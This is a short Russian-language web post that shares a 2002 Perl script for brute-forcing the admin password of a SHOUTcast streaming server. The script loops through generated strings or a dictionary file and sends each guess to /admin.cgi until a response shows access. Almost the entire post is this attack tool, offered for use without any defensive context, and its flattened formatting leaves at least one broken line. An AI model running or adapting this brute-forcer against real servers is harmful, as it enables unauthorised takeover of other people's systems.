SHOUTcast Admin Password Bruteforce Tool

  • Ссылки:
Этот инструмент поможет подобрать пароль администратора к SHOUTcast серверу: #!/usr/bin/perl ########################## # Shoutcast admin password bruteforce # # David Jacoby # [ dj@outpost24.com www.outpost24.com ] # # # # Greetings: #hack.se, #!synnergy, TESO, THC, #!ElectronicSouls, #security, #hack, #whitehat, #!SYN # # # Copyright ╘ 2002 Outpost24, All rights reserved. # use IO::Socket; system ("clear"); #system ("gcc -o ./bin/hack ./src/hack.c"); print "\n"; $host=$ARGV[0]; $port=$ARGV[1]; $brute=$ARGV[2]; if(!$hostname) { print "\n"; print "\t::: Outpost24 Security :::\n"; print "David Jacoby - dj\@outpost24.com - www.outpost24.com\n\n"; print "Usage: ./program [brute/dict]\n\n\n"; } else{}; if ($brute eq "brute") { for $pass (a .. zzzzzzzzzz) { system ("clear"); print "\n\n\n\n"; print "\t\t\t\tAttacking $host using the following password: $pass\n"; $EOL = "\015\012"; $BLANK = $EOL; $BLANK1 = $EOL; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); unless ($remote) { die "cannot connect to http daemon on $host" } $remote->autoflush(1); print $remote "GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK" . "Host: pewp.hack.se:8000 $BLANK" . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK" . "Accept: text/xml,application/xml,application/xhtml+xml, text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK" . "Accept-Language: en-us, en;q=0.50 $BLANK" . "Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK" . "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK" . "Keep-Alive: 300 $BLANK" . "Connection: keep-alive $BLANK" . "Cache-Control: max-age=0 $BLANK" . $BLANK1; while ( <$remote> ) { if (/interface/) { system ("clear"); print "\n\n\n\n"; print "\t\t\t\t\t\t ::: SUCCESS :::\n\n"; print "\t\t\t\t\t\tHostname: [$host]\n"; print "\t\t\t\t\t\tPassword: [$pass]\n\n\n"; exit 0 } } close $remote; }; }; if ($brute eq "dict") { open (InFile, "./dict/dict.txt") || die; $count = 0; while ($pass = ) { chop ($pass); use IO::Socket; system ("clear"); print "\n\n\n\n"; print "\t\t\t\tAttacking $host using the following password: $pass\n"; $EOL = "\015\012"; $BLANK = $EOL; $BLANK1 = $EOL; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); unless ($remote) { die "cannot connect to http daemon on $host" } $remote->autoflush(1); print $remote "GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK" . "Host: pewp.hack.se:8000 $BLANK" . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK" . "Accept: text/xml,application/xml,application/xhtml+xml,text/html; q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK" . "Accept-Language: en-us, en;q=0.50 $BLANK" . "Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK" . "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK" . "Keep-Alive: 300 $BLANK" . "Connection: keep-alive $BLANK" . "Cache-Control: max-age=0 $BLANK" . $BLANK1; while ( <$remote> ) { if (/interface/) { system ("clear"); print "\n\n\n\n"; print "\t\t\t\t\t\t ::: SUCCESS :::\n\n"; print "\t\t\t\t\t\tHostname: [$host]\n"; print "\t\t\t\t\t\tPassword: [$pass]\n\n\n"; exit 0 } } close $remote; }; system ("clear"); print "\n\n\n\n"; print "\t\t\t\t\t\t ::: DAMN DAMN! :::\n\n"; print "\t\t\t\t\t\tHostname: [$host]\n"; print "\t\t\t\t\t\tPassword: UNABLE TO FIND PASSWORD!\n\n\n"; exit 0 };